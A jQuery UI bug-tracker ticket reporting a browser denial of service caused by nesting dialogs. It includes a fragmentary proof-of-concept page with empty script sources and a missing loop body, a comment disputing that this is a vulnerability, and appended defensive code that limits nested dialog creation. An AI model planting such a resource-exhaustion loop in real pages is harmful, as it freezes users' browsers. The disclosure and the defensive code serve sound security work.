Opened 2 years ago

Last modified 2 years ago

#15390 new bug

Denial of Service (DoS) - jQuery UI 1.12.1 - Dialog

Reported by: Rafael Cintra Lopes
Owned by:
Priority: major
Milestone: none
Component: ui.dialog
Version: 1.12.1
Keywords:
Cc:
Blocked by:
Blocking:


When we inject the "dialog" for any HTML tag, more than once, the browser and the application crash, closing the application.


for (var i = 0; i < 10; i++) {


Create an HTML file with the following code or insert the Payload above in a vulnerable environment:

<!DOCTYPE html>
<html lang="en">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>DoS - jQuery UI 1.12.1</title>
    <h2>DoS - jQuery UI 1.12.1</h2>

        <button onclick="exploit()">Exploit</button>

    <p>PoC by Rafael Cintra Lopes</p>

    <script src="" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
    <script src="" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>

        function exploit(){
            for (var i = 0; i < 10; i++) {

Change History (3)

comment:1 Changed 2 years ago by Rafael Cintra Lopes

Priority: minor → major

comment:2 Changed 2 years ago by adriaon

Is work being done on this one? Cheers.

Last edited 2 years ago by adriaon

comment:3 Changed 2 years ago by Konrad Borowski

Not a security vulnerability in my opinion (this issue was reported as CVE-2020-28488) or even a bug for that matter. You are just spawning dialogue boxes in dialogue boxes - dialogue boxes themselves are made of divs which leads to exponential growth of dialogue boxes as you are spawning a dialogue box for each div in the document.

Last edited 2 years ago by Konrad Borowski
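
Added example, not part of the ticket or of jQuery UI: a guard against the growth described in comment:3, which drops elements that already sit inside a dialog wrapper and caps how many dialogs one call may open. `pickDialogTargets`, `MAX_DIALOGS` and `fakeEl` are hypothetical names; `ui-dialog` is the class jQuery UI puts on the dialog wrapper, and the fake elements are constructed so the block runs without a browser.

```javascript
// Added example: guard for code that turns a selection into jQuery UI dialogs.
// Assumption: the dialog wrapper carries the class "ui-dialog" and the widget's
// own divs (title bar, content, ...) are descendants of that wrapper.
const MAX_DIALOGS = 5; // constructed limit, tune per application

function pickDialogTargets(elements, max = MAX_DIALOGS) {
  // Element.closest() also tests the element itself, so the wrapper and
  // everything inside it are skipped and never wrapped in a second dialog.
  const fresh = Array.from(elements).filter((el) => !el.closest(".ui-dialog"));
  if (fresh.length > max) {
    throw new RangeError(`refusing to open ${fresh.length} dialogs (limit ${max})`);
  }
  return fresh;
}

// Browser usage: $(pickDialogTargets($("div.confirm").get())).dialog();

// Constructed stand-in for DOM elements; supports only ".class" selectors.
function fakeEl(name, parent = null, classes = []) {
  return {
    name,
    parent,
    classes,
    closest(selector) {
      const cls = selector.slice(1);
      for (let node = this; node; node = node.parent) {
        if (node.classes.includes(cls)) return node;
      }
      return null;
    },
  };
}

function demo() {
  // Constructed tree: one open dialog plus one div that is not a dialog yet.
  const wrapper = fakeEl("wrapper", null, ["ui-dialog"]);
  const titlebar = fakeEl("titlebar", wrapper, ["ui-dialog-titlebar"]);
  const content = fakeEl("content", wrapper, ["ui-dialog-content"]);
  const plain = fakeEl("plain");
  return pickDialogTargets([wrapper, titlebar, content, plain]).map((el) => el.name);
}

console.log(demo());
```

Because a div that has been turned into a dialog is moved inside a `ui-dialog` wrapper, a second pass over the same selection yields no new targets.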